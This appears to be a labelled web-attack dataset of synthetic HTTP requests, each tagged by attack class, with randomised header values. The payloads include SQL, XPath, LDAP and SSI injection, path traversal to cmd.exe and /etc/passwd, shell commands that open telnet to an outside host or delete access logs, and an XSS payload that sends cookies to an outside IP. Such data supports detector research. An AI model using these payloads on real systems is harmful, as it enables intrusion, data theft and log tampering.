GET /Z-mQ2c/m4sxdPVVN04X21/5a.tiff?8b66having_Cprocessing-instructionautoexec=%27%3B+EXEC++master.dbo.sp_makewebtask++++%27c%3A%5Cinetpub%5Cwwwroot%5Clie7r9d.js%27%2C+++%27SELECT+++++pxqrs++FROM++ie++++WHERE++++xtype%3D%27%27U%27%27%27&ss=w1fwget3gmf&nore=9146&Soqls6p=790969&FDF7tLxmlAvU=069&vmss=83&4uoreMhhc=ni%26nspeo%28r&l2pesr5l1oet=llrIchSshutdown HTTP/1.1
Host: 168.34.207.156
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Cookie: cYzxhavingrXK5yJT=eL
Cookie2: $Version="13"
Date: Fri, 09 Sep 05 07:10:32 UTC
If-Modified-Since: Sat, 08 Mar 08 24:21:51 GMT
If-Unmodified-Since: Mon, 08 Sep 08 02:41:17 UTC
Max-Forwards: 268
Referer: http://eohm.com/ihehn/3ihuNeh/TOLo/ueoyedh/ziziN.mpeg
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 6.3; sc-hi; rv:6.3.0) Gecko/19432669
UA-Color: color16
Via: 1.9 212.65.243.243, HTTP/5.2 www.ehrodi.jpeg
Transfer-Encoding: compress
Warning: 123 www.r6hayneh.css:34967 "ekee0eeac6" "Fri, 19 Aug 05 20:22:44 CET"

null

End - Id: 36418
Start - Id: 49878
class: XPathInjection
GET /3Ozc/tEnMb_.png?zr=6485891&aHeophreNdweei=eval7hh&Ewut=dletnr%27+++or+++%28i+++%3C+++++count%28wheeTe%2Fchild%3A%3Atext%28%29%29+++and+j+++++%3C++++count%28hi%2Fchild%3A%3Acomment%28%29%29+++and+++k++++%3C+++count%281e%2Fchild%3A%3A*%29+++++%29+or+++%277E4k9%27+%3D++++%27+++iTninjli%27+++or&rzLen6tmeskhn6=i4tcoaieepdmtnt&iv0VY=%26++ioLfnkOhnlbno7ee&oodonsevjkielh=t%25h&lfeormuo=r0oeiitop60neSxqdi&woaz=2108191153&IpA2PiYpWCT=iiis8tge4EDra&LXPlCq=aoY%5Cutdteo+dg%24ea%240&srOtlosHhr=55&GOssRaikeaeii=A3re HTTP/1.1
Host: www.epo1.fr:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: max-age=2657
Client-ip: 161.161.216.27
Cookie: sfanddyH9HpGmc=fromO:on=v;vs=33379738;itOok=dE9dn%u~hyeti+;8oagseisY=464
Cookie2: $Version="5"
Date: Thu, 29 Nov 07 20:14:58 GMT
ETag: "EJS62.u3b70ce3fOJ35"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Sat, 13 May 06 10:13:25 UTC
If-Match: "ICWJKCc4HiP1L5JR"
If-None-Match: *
If-Range: Tue, 19 Sep 06 14:38:20 CET
Max-Forwards: 09
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest algorithm=MD5
Range: -615,3-,271930-
Referer: /vfmz8.msf
TE: trailers,trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: honEqr/6.5.9
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 005x724
Via: 8.7 179.205.81.28
Transfer-Encoding: compress
Upgrade: eDdkCa/8.3
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49878
Start - Id: 40230
class: SSI
GET /tUSiu/isosnn.mdb?heeavrr=734587659&24te=glHI9LXCDla&fgCee1nxer4tzu=wfua.r&E@-adpEW4=inec0xoLqYsf&gnmsM=shodtailkeFnaer&r2facieendqfOat=7360&77tb=6348784051&rdj3zmthpol7re=zzre&esleit=ndju&aeuuoj1tart=94&eLOeln=yiewnoCdeNa&autoexecAJTqN=4sIsu&bsb=2601418&pciemiAv1ve=osR HTTP/1.0
Host: www.lgttffisn.de
Connection: swi0e
Accept: image/*, audio/*, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: <!--  #exec  cmd="c:\progra~1\mTaito\Odnl\nm.exe d:\fbnewr7In\www.nsnaen.org\gtimhiuwa\database.mdb   /x  exporttofoxpro"-->
Cookie: u6eAhPl=gb;aep=8536;execkTYz=4357
Cookie2: $Version="00"
Date: Tue, 28 Aug 07 17:41:23 GMT
Expect: egeror=3turtije;s4teut=ro8ebpsm
If-Modified-Since: Tue, 06 Oct 09 02:16:07 UTC
If-None-Match: "7ddebs1@YZfF-rJZ"
If-Range: *
Max-Forwards: 7312
MIME-Version: 1.3
Pragma: sd85ogos=ouorhthv
Referer: http://www.nBp9sD2d.fr/oi09T.msf
TE: trailers,chunked,deflate
User-Agent: oeIjodti3tnaul
Transfer-Encoding: gzip

null

End - Id: 40230
Start - Id: 49291
class: XPathInjection
GET /tg/totr5uiiNoe/oytvrr3saerhhstnbn6/6..T/dsxS_J73izcN78.KgjK/tcer4Odld/iYsy-Sf-u_GfzT9/mmIE5lnetcatX2WLinsertXt/l2QLr3zNLGvxT5Dqc6k.shtml?itbae3e=44++++or+++++1%3C++++a%2FdP%2FE7phsx%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D704%5D+or+0%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.u0roiti.gov:80
Connection: keep-alive
Accept: video/*, image/*, audio/basic
Accept-Charset: x-mac-ce, x-mac-icelandic, iso-8859-15;q=0.7, iso-8859-15
Accept-Encoding: 
Accept-Language: aeuv0q0-s7, jo7-ha;q=0.7, rran-ept7oshe;q=0.1
Cache-Control: only-if-cached
Client-ip: 226.125.42.173
Cookie: oann7An3=olue5Tieiaoin;cIeg=l52yKX53;reeIt=67318503;tt7syi=vliavo;nahEon5f=06;tpeSFhbeauxmno=Ot
Cookie2: $Version="213"
Date: Sun, 17 Jun 07 16:45:12 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 07 Mar 08 16:40:00 CET
If-Unmodified-Since: Tue, 24 May 05 24:14:54 UTC
If-Match: "hJAlLTWTWjlx@29i21T"
If-None-Match: "Tv_8_QwBhSU1limYRq8"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: 2aeiEe=hoayO
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic bUU2SW5lOmd1ZGw0c25l
Range: 305761-528973
Referer: http://www.tlT1e.it/un1t/mrnuzs/Dcsbp/dfmdwuhn.exe
TE: trailers,trailers,deflate
Trailer: Trailer
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 2.2; r6-ae; rv:9.4.7) Gecko/04021910
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7888x6205
Via: 5.4 www.N4S3sv.shtml:33, vgb/4.0 153.198.61.121, tRHui/9.5 109.76.251.84
Transfer-Encoding: tnnc
Upgrade: kefEa/0.4, sicxsn/0.6, oeAol/1.0, tMesla/8.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49291
Start - Id: 36475
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 24.198.229.37
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.5, compress
Accept-Language: *;q=0.2
Cache-Control: min-fresh=0529
Client-ip: 92.39.253.160
Cookie: se6eibF=rdqnpezziidIty;i2xsfem=an1creb9;9aijsg=58896;rdctaiwGetfsrH=tscriptoaognwhtpasseft
Cookie2: $Version="987"
Date: Fri, 17 Jul 09 06:40:52 CET
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Mon, 04 Jul 05 22:45:41 GMT
If-Unmodified-Since: Thu, 05 Jan 06 12:22:59 GMT
If-Match: "QZD.TK-Qom_HbzY_.p"
If-None-Match: *
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 436
MIME-Version: 9.8
Pragma: eodhe='rlcblic'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 57-,410056-,436232-1281
Referer: /sb8ie/ifima.dll
TE: trailers,deflate
Trailer: Date
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 4.2; li-it; rv:9.7.3) Gecko/99915319
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 0.2 195.202.24.221:66427, FTP/4.4 182.0.72.61, HTTP/4.6 180.189.39.27
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36475
Start - Id: 43633
class: OsCommanding
POST /7uh/n@YApmf/5WEGPlf/Ltraolrheoet/epRq_9O3L2mR2GHipw19/rZxAY55cdk0V4boB1NC/ruentSoedvwrt33foto/TusrasnullRsNaAsock_streammbla.php4? HTTP/1.1
Content-Length: 128
Content-Language: rjo,rbRd4eE
Content-Encoding: identity
Content-Location: /mwpax7s0/eop5se/evradih.mdb
Content-MD5: SDBsZXIwb2hzZ2FXYWl0eg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Mar 09 22:41:25 CET
Last-Modified: Fri, 06 Feb 04 07:16:56 CET
Host: www.toib.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress, gzip;q=0.8, compress, identity;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 74.56.238.145
Cookie: betweengimga14dexecsLW=%;eunnn=\" \;    \/usr\/bin\/telnet   www.veattetina.com     2616  ;;tr77d47ri=ezlo wo/djes;sdvfs=ncmdks
Cookie2: $Version="392"
Date: Thu, 04 Mar 04 01:00:35 UTC
ETag: "BF1Cmm3Op3NN5hIMbu.J"
Expect: 100-continue
If-Modified-Since: Mon, 30 Oct 06 14:42:25 GMT
If-Unmodified-Since: Thu, 17 Nov 05 13:29:02 CET
If-Match: "kUZXP-sl93VGUIGZ76xI"
If-None-Match: *
If-Range: "Eu3lrygeHtIb8_1es-"
Max-Forwards: 9
Pragma: log=teg
Proxy-Authorization: vmtm8 ie6h=oe8d
Authorization: ndup ft4i=nEgC
Range: 28-30578,2890-
Referer: http://www.stEa3P.be/weul/z5myra.php4
TE: trailers,trailers,trailers
User-Agent: Mozilla/1.0 (X11; U; Linux i386 8.4; se-no; rv:3.8.4) Gecko/55596531
UA-CPU: x86
UA-Disp: 9318,8305,16
UA-OS: Win95
Via: HTTP/2.6 246.247.83.104, 6.2 245.74.141.113, 9.0 www.ssaafs.html
Transfer-Encoding: gzip
Warning: 715 www.t2iabbtc.tiff "eagnkqCo5tdtte" "Wed, 05 Apr 06 22:22:37 CET"
X-Serial-Number: 3183555985904482173
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7tRie=xxQnjk..68bq&FLJj@CUc=asGpdvT&lsncub2kd0=ojr54G&ha4ltoSwgh=8&qil4an=1094&Pj8exec4ClbbUvR=I7netcatedr6gr&reseiartcglo=11848

End - Id: 43633
Start - Id: 36675
class: OsCommanding
GET /oVbWQyKs5Z8q9KloYk/ei/nR1Zy/seDnqutfyhi0znq/aAuERfEkJAeGUoJ/oOIu-ZjDF9@NwQmOQDxj/kA/IxmRceeqeoneteioois/mY.5ls9Egi3CY/i2bsknD6kCCxIV7-b/eirCmfIzIDn0m4Y1N.exe?6ZlfchildopengslK=4965278&ttaf6hvbsih76he=veh8ecopy+e3&8dmiht9tado=t3eqMdC&rvkbmqsr=VRhlloinliT HTTP/1.0
Host: www.a6wiyaiy.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, windows-1253;q=0.8, cp-950
Accept-Encoding: 
Accept-Language: %0arm    -f   /var/log/httpd/access_log;
Cache-Control: only-if-cached
Client-ip: 14.224.231.96
Cookie: iy2tat=7;tSt7gnpaci9tns=zDYgK3Bs9;boot.iniSetclochildt-9=9T8kbes9;dLpU8soU=)o9nn
Cookie2: $Version="4"
Date: Fri, 20 May 05 07:53:44 GMT
ETag: "_JmByTPQ3I3FKz9CeL"
From: e3ciy@eehmhnotl.be
If-Modified-Since: Wed, 20 Jul 05 10:19:52 GMT
If-Unmodified-Since: Tue, 04 Jul 06 06:48:36 GMT
If-Match: "9@pX57CchNp9si1QCv0"
If-None-Match: *
If-Range: Fri, 02 Oct 09 21:50:28 UTC
Max-Forwards: 9
MIME-Version: 5.4
Pragma: eadZmk=arkcia
Proxy-Authorization: Basic bXRtMzQ6Um9zcnNFZA==
Range: 50-4,41661-
Referer: http://haMbt.de/ccaTehc/edrniZs/9ese/ensOnr/uhrnS3o.css
TE: trailers,deflate;q=0.8,chunked;q=0.9
Trailer: If-Match
User-Agent: yfm.1KQZxS http://www.eudnp.fr
UA-OS: FreeBSD
UA-Pixels: 211x4085
Via: 3.2 www.iueo.jpeg:7, sjtdii/1.8 www.mey5ekob.htm
Transfer-Encoding: deflate
Upgrade: k21de0/3.9, tcu/7.2, 6go/7.9, sirla/2.0, elb/6.0
Warning: 061 72.184.224.213:239 "i7ira53rgk" 
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36675
Start - Id: 46436
class: PathTransversal
POST /.UmKwallsHnW/eNW7window.openinsertboot.iniv/fetzTau3yeA7adiWnnh/P2wcFsystem9/owRLfKWcqta0qLLwbanG/cchilddJkT0netcatJEA/nn1snie0obU8/ygennqosAevt1olpee/tF5viccmtnrkh.mdb? HTTP/1.0
Content-Length: 92
Content-Language: 8Ih
Content-Encoding: gzip
Content-MD5: ZWxncGF0dGx0ZHNXN2F0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jul 08 21:29:14 GMT
Host: www.tssevf9u.fr
Connection: close
Accept: application/*;q=0.6, application/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: ../../../../../../../../../etc/passwd
Date: Thu, 20 Jan 05 17:15:33 GMT
Referer: /dliux.gif
User-Agent: itwtfvtt/0.1
UA-CPU: MIPS
UA-Color: color32
Transfer-Encoding: deflate
----: ----------------------------------------

zily8Seeouozhnn=w?n3prmeetr1\\r&oonqjnd=Ottue&yUing=aaGs&lseLnH=138764078&tsArc1t=4293

End - Id: 46436
Start - Id: 39499
class: SSI
GET /owhisferLss/vi.jsp?dEvs=lnwow0&5o2En=e1luinsertra9&jhDochrto=twf3lieLonch3wt&lnxsill=pe6&6a=%28knvboot.ini0zrzin%28&eqmaewi=8dwoutHeegoEdn7s&iU8emup=s9NI6c9xvbM HTTP/1.0
Host: 126.83.213.7
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress
Accept-Language: <!-- #include    virtual="/var/log/httpd/access.log"    -->
Cache-Control: only-if-cached
Client-ip: 1.51.177.234
Cookie: NXW.q=ndde elibge8l;ferurcp0B=r;towjn=278;ssrmshlSnl=png gNse
Date: Sun, 17 Sep 06 10:15:34 UTC
ETag: W/"WZNJPRVhwKs5WbH1Gdm"
Expect: 100-continue
From: el2u@0la399.com
If-Modified-Since: Sat, 09 Oct 04 03:54:02 CET
If-Unmodified-Since: Sun, 25 Jun 06 21:31:58 UTC
If-Match: "qFJ-x7JYvJeq9BC6VSpW"
If-None-Match: *
If-Range: Thu, 02 Dec 04 09:44:20 UTC
Max-Forwards: 82
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlaG90c2VsVHN0RXRhOXFBdGF0ZGlsUlRpZW9JZTRvQW1pc1QzMg==
Authorization: Basic OHNldXRoOmFyenQ=
Referer: http://www.ayucoto.st/ddweaeka/yidTi.jpeg
TE: deflate;q=0.2
User-Agent: nf5chbln/1.4
UA-OS: Linux
UA-Color: color16
UA-Pixels: 296x5456
Via: 9.4 www.icbaer.htm, 0.6 203.157.244.236, 4.5 www.5rr5im.css:5
Transfer-Encoding: bavrx
X-Serial-Number: 5484485969570755
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39499
Start - Id: 43719
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.sybqsuoB.uk
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, x-mac-hebrew;q=0.9
Accept-Encoding: *
Accept-Language: Nef-tttseari, aie-a7roa2Fp, ttbmnTj-ifn7, ot6ie-twnr5t, tUah4tpn-65teeaaa;q=0.9
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Mon, 12 Jan 09 10:03:28 UTC
ETag: "WuqeTiXQlvgbu6xrYI"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Thu, 29 Jul 04 13:53:36 GMT
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: "jSp8@YQCCbUK0mCd-."
If-Range: "hoQrK0RDR-MuOchvHKu"
Max-Forwards: 224
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM ZW5rZWVzZTBwY0l1aDdsbHdBMmxhT2VhT2FhNmNkeHRhd2U3bjQ=
Authorization: Basic ZXRpc2U6ZlR4bmw=
Range: 7008-71
Referer: http://eceeot1.st/nd8dt.mp3
TE: gzip,deflate
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 3.8; kq-aa; rv:5.4.2) Gecko/38194710
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 284x7393
Via: FTP/4.5 9.210.222.206:359
Transfer-Encoding: deflate
Upgrade: fnetaM/4.9, l3e/1.2
Warning: 546 161.55.81.201 "zehnaoi8Htrab7epa" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 601406
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43719
Start - Id: 37311
class: LdapInjection
GET /E24Bvbscript4/Z.selectZ40tx/i0frOpSwmEadohmp8tEh/fMVooZAEz.1lrB/l3HCZWwrlogJyjuTW/wudiv8fetSg/nar0ee/zhxdtaed/ih0ln/GWDvJ_.js? HTTP/1.1
Host: www.teewderao.net:80
Connection: uguo
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: mns6y-irheeb2;q=0.3
Cache-Control: max-stale
Client-ip: 181.208.243.92
Cookie: KIeVrzuYCuP=hd9e;cn9tetslsnn=nTesnfteElgisxn8eg
Cookie2: $Version="1"
Date: Wed, 13 Feb 08 18:55:00 CET
ETag: W/"tl_jTDITfIAnf1Nk"
Expect: eltioihl=t1tinEet
From: sorzn@iDilimhi.net
If-Modified-Since: Thu, 09 Jul 09 09:10:44 CET
If-Unmodified-Since: Tue, 03 Feb 04 17:08:53 UTC
If-Match: *
If-None-Match: "tX@zM-ahcTpZHss"
If-Range: Sat, 29 Nov 08 19:46:56 CET
Max-Forwards: 57
MIME-Version: 4.4
Pragma: st=ab
Proxy-Authorization: NTLM ZG9yaG9yb28xb2VocjFzZWVhdHc1OGVlZW90YWRpZGFBRm1kdWxyZXR0b1k=
Authorization: NTLM ZXRvdWVsbG90aXZjd2VpZXVybGF2bmFmdDllcGNvMkF0dWpzbXVPOGd0
Range: 17-
Referer: /raobt/tioUel8r.tar.gz
TE: chunked;q=0.4,trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/8.8 (Windows; U; Win98 6.4; nm-km; rv:0.4.8) Gecko/07560853
UA-CPU: Sparc
UA-Disp: 050,5091,32
UA-Color: color16
Via: HTTP/2.9 www.nrjomRl.tiff, 6.3 www.srieOt4r.css, Cshc/8.7 www.fhtot.gif
Transfer-Encoding: gzip
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 97.235.140.149
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37311
Start - Id: 46882
class: XSS
POST /ezbte.dll? HTTP/1.0
Content-Length: 366
Content-Language: dtcbt,rrfsn
Content-Encoding: identity
Content-Location: http://otep0m.ch/dvlto/2p6a8/aaht7eym/hsECH/hEvi.jpg
Content-MD5: YWplZGU2YWhya3JwbXNoNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 10:27:09 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: www.aaeh9mool.uk
Connection: close
Accept: image/*;q=0.6, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: tt3-ebiMccdf;q=0.6, coeechcw-ar, o-onrkmte;q=0.6
Cache-Control: no-cache
Client-ip: 152.184.163.84
Cookie: alaTm=0851242;R@WulikeK=tt;soLwi=i-pGtHU;sEdokeOue5on=crsepSeo>tnph-teh
Cookie2: $Version="69"
Date: Sun, 30 Mar 08 18:44:30 GMT
ETag: "2lelK@QzT6NAvfG"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: xorersew@0i1thu.fr
If-Modified-Since: Wed, 26 Aug 09 04:27:02 CET
If-Unmodified-Since: Sat, 03 Apr 04 02:59:33 UTC
If-Match: *
If-None-Match: "cB3ebdaEj-Wo8XLHUN"
If-Range: *
Max-Forwards: 144
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic aHVlNFVTaTpkNW50aE50dw==
Authorization: Digest qop=auth
Range: -87,-41
Referer: /eesanmS/3yni/an0sd6w/ere4jhne/faLtse7.conf
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: ojnue (dq0c_FQ; nfE8gNu; as2Aoc; afwwYhcC)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: deflate
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------
~~~~~: ~~~~~~~~~~~

o8lmarTwsig=liaNe6&adhbeeprhsk4sRw=69Ey&XZgUevalH3h8W=<input   type    ="     image  " dynsrc =    "    javascript:  [alert   ('etlp9nedne');]    "    >&ne3=usasp43tntaynt&replaceEEdr=278230&wx8lo=s7GzBPkftBJ&PReGvar=ecQ4to:3eu&3hi=iiJcg3&ah0snthh=377287341&Urme0whsLnzziSe=rnjobjecte:w0i4&dechnske=56656&vEGf@GqL3=ut8dDM&j8w3o=sh

End - Id: 46882
Start - Id: 39513
class: SSI
GET /iMgkYCRfFzBe/jntieSfnteahtdsndhzW/uvpirdery9fhtzta/wBvIXWhB9gel/e1olz/OftqhtyduwrjonT/i4757l/d5KxfKBfdID_S@i.mspx?rs=sOi&AbrN041n4iy=htjpautoexecm%29oi&fperlimQVT=1543705&-7e5Oc21N=gj%40cRrkZ&wsegsvem=oRnzHlerDG9&genhIEiLiOeaths=sIXPH-tc&eMvo=xus HTTP/1.0
Host: 40.141.152.44
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Language: <!--    #include virtual="/etc/httpd/httpd.conf"  -->
Cache-Control: no-cache
Client-ip: 123.53.218.168
Cookie: Hftpg5bjX=systemps%le;O9lwgjalweea=trb;3taairtru=hfRAeYsqodj64oie;hAru0pAm=so;dlmkigln= 
Date: Thu, 14 Sep 06 10:24:56 GMT
Expect: hnSfan
Max-Forwards: 962
Referer: /srFe/tkCde/sstde/rydssns.rar
Trailer: Date
User-Agent: hOtqef2OR http://www.iosumhh.be
Transfer-Encoding: deflate
Upgrade: sysfnd/5.6

null

End - Id: 39513
Start - Id: 47457
class: XSS
GET /uhe0opnsrof0wee/2ul5/hi94yaintscn3eoie/oDmu7UiWGzSiE2zC./syigaaacpmyt.exe?bttritii8h=%3Cdiv+++onmouseover%3D+++%22+++%5Bwindow.open%28%27http%3A%2F%2F102.201.84.246%2Fneon.asp%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&zi5y=9ns+ HTTP/1.0
Host: 17.78.36.73:97
Connection: close
Accept: */*
Accept-Charset: windows-1251, x-mac-hebrew
Accept-Encoding: identity;q=0.7, compress, identity;q=0.5
Accept-Language: a1thonfa-c, dEoxs6-e, nizs91z-33, atkemo-t;q=0.1
Cache-Control: no-store
Client-ip: 146.143.28.253
Cookie: iyo=t_G0EtP;rTEOednRxe=<
Cookie2: $Version="073"
Date: Sun, 30 Oct 05 06:27:41 GMT
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Sat, 27 Mar 04 19:39:19 UTC
If-Match: "QihT2@JJj9rNApZHG"
If-None-Match: *
If-Range: "E8xMKufH0cdVvARJ"
Max-Forwards: 1066
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=erorm7y
Range: 9547-817639
Referer: http://nemh.ch/ythblN/5r7r.php3
TE: chunked;q=0.1,trailers
Trailer: From
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 8.7; n8-TZ; rv:3.0.5) Gecko/27148343
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4532x5831
Via: Nas/2.9 www.XoscoTVp.jpeg, FTP/8.0 www.stDe.css, iOCte5/7.3 www.e32na3.png
Transfer-Encoding: gzip
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 226091720709125
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47457
Start - Id: 46385
class: PathTransversal
GET /binNeryVSPhW/gldelaaelEdt1i1glCnU/zhPhG5IQOHid.9boot.inif/tRzw/dsrcAi/PB2Gd/a.xAAqs7VI@uB7DlM5V/uwCv7F8xMCTNGPdiUWTB.tiff?ttqzani=qto6n6zathk&prhlbrertfadtSz=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&sNaiw=6166&n3ierm0=1&odnaWm=ttbh&witat=gmsuuiwc&fromAkphTB=eFvKf3ZE&ntwnuloVts2=aomeacOing3xtermlt&C9xK6sSm=nuto&t6=133 HTTP/1.0
Host: www.tednhhlt.biz
Connection: oth2u
Accept: application/*;q=0.5, audio/x-wav, video/*
Accept-Charset: iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: fi0oaLI-5b3het, s-l
Cache-Control: irA0e='epnseh'
Client-ip: 230.204.6.13
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="1"
Date: Sun, 22 Jun 08 15:54:21 UTC
ETag: "ql0484w1O30JHkv1kQE7"
Expect: 100-continue
From: ladasd@didtoeUsr.uk
If-Modified-Since: Wed, 14 Jan 09 02:36:54 UTC
If-Unmodified-Since: Wed, 16 Jan 08 19:35:44 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "ZEvCD@QUg8SiH@BPGeQ"
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 3976
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: hdes nflr9u=Tyswralt
Authorization: NTLM b3N2Y21yaFM3bnlsZmZzbGVpWU50aWVlaHJ1b2gwMWVJYTA=
Range: 2-1818,846125-
Referer: http://theao.cz/oukdrs/iasRea/nnHUTyt.nsf
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/6.8 (compatible; Konqueror/0.7; SunOS sun4u; rtgwt; ezeEx4rhe)
UA-CPU: MIPS
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: 3.5 176.191.74.65:2838, uod/4.7 217.215.74.199
